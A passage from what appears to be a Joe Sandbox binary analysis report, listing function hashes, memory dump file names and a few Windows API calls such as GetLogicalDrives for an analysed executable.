                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: cebec52c35d6d5a577127b37ee6518f550ca64958a00bab29b82289b9b11b50d
                                                                                                                                                                                                                                                                                    • Instruction ID: 6ff4827c734279f7e0de841156aecca73684415df30a65aab8c3daa831c00a85
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cebec52c35d6d5a577127b37ee6518f550ca64958a00bab29b82289b9b11b50d
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20D1F8B2D082689AF7248A24DC44BEA7A75EB51310F0480FED44D57381DB7D5FC58FA6
                                                                                                                                                                                                                                                                                    Function 0050DE5C Relevance: .3, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: a57a128d1c16c12dcf4902804604208ecf22197fe885c780f8585ef138a26dff
                                                                                                                                                                                                                                                                                    • Instruction ID: 5f65285439b790b28c0d3b905ad07066762363c037cdec378342d8cce10f23cf
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a57a128d1c16c12dcf4902804604208ecf22197fe885c780f8585ef138a26dff
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 37B129316106099FD725CF28C48AB697FA0FF45364F298A58E89ACF2E1C375E991CB40
                                                                                                                                                                                                                                                                                    Function 0044E62C Relevance: .3, Instructions: 251COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: 6156ee7c5859b3a1fcc43b2bfc7c0dd90522ffcbcea94545f825d9af007e4808
                                                                                                                                                                                                                                                                                    • Instruction ID: 6352d4130b6d38eda3f0917f26ea75489461ad1f8f451fda06db58098b015cac
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6156ee7c5859b3a1fcc43b2bfc7c0dd90522ffcbcea94545f825d9af007e4808
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F5A10BB1E081588AF7248625DC48BEA7AB5EF51314F0480FED44C57382DA7D9FC98F66
                                                                                                                                                                                                                                                                                    Function 0044CC6D Relevance: .2, Instructions: 248COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: 411b77f1b17c79f053f6b327d9239c780f28367bd5560390947adfcd919ec4d5
                                                                                                                                                                                                                                                                                    • Instruction ID: a4e126031ac1d6303b47f947723bb3408289ab635862262de87fc69cd77de02e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 411b77f1b17c79f053f6b327d9239c780f28367bd5560390947adfcd919ec4d5
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A491ECB2D002689FE7648B24DC85AEBBB74FB41314F1401FAD80DA7740E6789FC58E92
                                                                                                                                                                                                                                                                                    Function 00435C7F Relevance: .2, Instructions: 224COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: 7d6ebca054e2f7689b85a4b771460ec9d32b8fbed782caf1c0a8fd484408adaf
                                                                                                                                                                                                                                                                                    • Instruction ID: 51035fdd40ba6af130e1cf43e43ed3c5e8d361631574942da8f568cd0f70edfa
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d6ebca054e2f7689b85a4b771460ec9d32b8fbed782caf1c0a8fd484408adaf
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F8118B3C012255BF728CA28CD9AAEABB79EB50304F0541BEE80D662C0D67D1FC5CE51
                                                                                                                                                                                                                                                                                    Function 00435F01 Relevance: .2, Instructions: 182COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: d448fed136f6b013e5f0e5fe5ac6345940a68bad63eab45d570404b4bc144211
                                                                                                                                                                                                                                                                                    • Instruction ID: 0f8d8f1531549f543e787c892f2a16359ab3b996e260e3aad9816a7d043ea16d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d448fed136f6b013e5f0e5fe5ac6345940a68bad63eab45d570404b4bc144211
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B761F1B2C002659FE728CA14DD89AEEBBB8EB58304F0581FAD80D57280D7796FC1CE51
                                                                                                                                                                                                                                                                                    Function 00502A5F Relevance: .1, Instructions: 147COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: 5832c10c76a503e9a85356905cf93c2ddb7a004c06b6a20f67111e80e155f7e7
                                                                                                                                                                                                                                                                                    • Instruction ID: 3665b7449f4d170db1c228802c273e752dcebb0474082da94558a54a5cde6ba4
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5832c10c76a503e9a85356905cf93c2ddb7a004c06b6a20f67111e80e155f7e7
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D2519EB1A002058FEB25CF69D9997AEBBF0FB48310F59843AC405EB2A0D3749D80CF50
                                                                                                                                                                                                                                                                                    Function 0043430E Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: 70d014d65552d08ad7cd422562661d9099514aa5f296e359a8a4409b7059de46
                                                                                                                                                                                                                                                                                    • Instruction ID: fd6bbcd556357d9eeb051eeb42d7f6bccc5d62fccbdccfe49c3443563a2f1b6c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 70d014d65552d08ad7cd422562661d9099514aa5f296e359a8a4409b7059de46
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9841B6B2D042155BEB28CB28DD56AFABB79EB94304F0481FFD40D66684D7385F818E41
                                                                                                                                                                                                                                                                                    Function 00468F80 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: d6eb95aebdd0832f893845c2801e487cae1a373ae23844e6cf616ad7b7813bce
                                                                                                                                                                                                                                                                                    • Instruction ID: 25f691dd9f4b04871031b08211d0b3aff43497b52775273811143d25c2d92c00
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d6eb95aebdd0832f893845c2801e487cae1a373ae23844e6cf616ad7b7813bce
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0211C933769A1007E76C843C58523AB418743E5738F298B2FA936C63E8E97DCD42515E
                                                                                                                                                                                                                                                                                    Function 00402140 Relevance: 33.6, APIs: 7, Strings: 12, Instructions: 304windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041DB30: GetLogicalDrives.KERNEL32 ref: 0041DB47
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041DB30: GetDriveTypeW.KERNEL32(?,?,?,75BFAF60), ref: 0041DB8A
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001037,00000000,00000000), ref: 0040218F
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001036,00000000,00000000), ref: 004021A2
